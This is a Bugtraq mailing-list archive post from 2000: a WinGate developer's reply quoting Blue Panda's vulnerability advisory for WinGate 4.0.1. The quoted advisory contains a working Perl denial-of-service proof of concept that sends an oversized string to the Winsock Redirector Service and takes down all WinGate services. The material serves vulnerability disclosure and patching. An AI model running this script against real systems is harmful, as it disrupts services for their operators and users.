Bugtraq mailing list archives
Re: Wingate 4.0.1 denial-of-service
From: Doug Kassuba <dkassuba () I2K NET>
Date: Mon, 2 Oct 2000 18:51:34 -0000
We used your information to analyse this weakness and it was fixed for the next release, which will be the beta version of WinGate 4.1. This is currently available at http://wingate.deerfield.com/beta For normal use it is not too serious a vulnerability as the Winsock Redirector Service is by default only bound to the local network adaptors and there is no point in binding it to public (internet) adaptors, meaning that the attack would have to be launched from within the LAN. GateKeeper will warn the operator when they bind the Winsock Redirector Service to a public adaptor. WinGate Development Team ====================================== ===========================
Blue Panda Vulnerability Announcement: Wingate
4.0.1
02/10/2000 (dd/mm/yyyy) bluepanda () dwarf box sk http://bluepanda.box.sk/
====================================== ===========================
Details available in attached file.
====================================== ===========================
Blue Panda Vulnerability Announcement: Wingate
4.0.1
02/10/2000 (dd/mm/yyyy) bluepanda () dwarf box sk http://bluepanda.box.sk/
====================================== ===========================
Problem: The Wingate engine can be disabled by
sending an abnormal string to
the Winsock Redirecter Service. The attack is not
logged.
Vulnerable: Wingate Home/Standard/Pro 4.0.1,
possible prior versions
(untested). Immune: Wingate 4.1 Beta A Vendor status: Notified. =================== Proof of concept: =================== #!/usr/bin/perl # # wgate401.pl - Wingate 4.0.1 denial-of-service # Blue Panda - bluepanda () dwarf box sk # http://bluepanda.box.sk/ # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of
concept, and
# is not intended to be used for illegal purposes. I
accept
# no responsibility for damage incurred by the use
of it.
# ---------------------------------------------------------- # # Causes all Wingate services to become
unavailable until the Wingate Engine
# is restarted. The Winsock Redirector Service
must be enabled in order for
# this to work. Tested on the evaluation version of
Wingate Pro 4.0.1.
# use IO::Socket; $host = "host.com"; $port = "2080"; $sleepfor = 1; print "Wingate 4.0.1 denial-of-service Blue Panda - bluepanda\@dwarf.box.sk http://bluepanda.box.sk/ ---------------------------------------------------------- Disclaimer: this file is intended as proof of concept,
and
is not intended to be used for illegal purposes. I
accept
no responsibility for damage incurred by the use of
it.
---------------------------------------------------------- Causes all Wingate services to become
unavailable until the Wingate Engine
is restarted. The Winsock Redirector Service must
be enabled in order for
this to work.\n\n"; # Connect to the Winsock Redirector Service. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n"; # Send some characters to the Winsock
Redirector Service.
$buffer = "a" x 1079; print $socket "$buffer"; # Wait a few seconds. $counter = 0; print "Sleeping for $sleepfor seconds."; while($counter < $sleepfor) { sleep(1); print "."; $counter += 1; } print "\n"; # Close the connection. The Winsock Redirector
Service should now be
# disabled. close($socket); # Connect once more to the Winsock Redirector
Service. This will disable all
# other services. print "Connecting to $host:$port..."; $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n"; # Finished. close($socket);
Current thread:
- Wingate 4.0.1 denial-of-service Blue Panda (Oct 02)
- Re: Wingate 4.0.1 denial-of-service Lee Thompson (Oct 02)
- <Possible follow-ups>
- Re: Wingate 4.0.1 denial-of-service Doug Kassuba (Oct 02)